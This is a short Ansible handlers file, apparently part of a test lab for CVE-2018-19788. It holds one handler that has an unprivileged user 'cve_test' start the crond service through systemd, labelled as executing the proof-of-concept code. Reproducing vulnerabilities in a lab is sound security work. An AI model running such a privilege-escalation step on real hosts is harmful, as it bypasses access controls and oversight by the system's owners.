---
# handlers file for CVE-2018-19788

- name: Execute the PoC code as unprivileged user
  systemd:
    state: started
    daemon_reload: Yes
    name: crond
  register: exploit_output
  become: Yes
  become_user: cve_test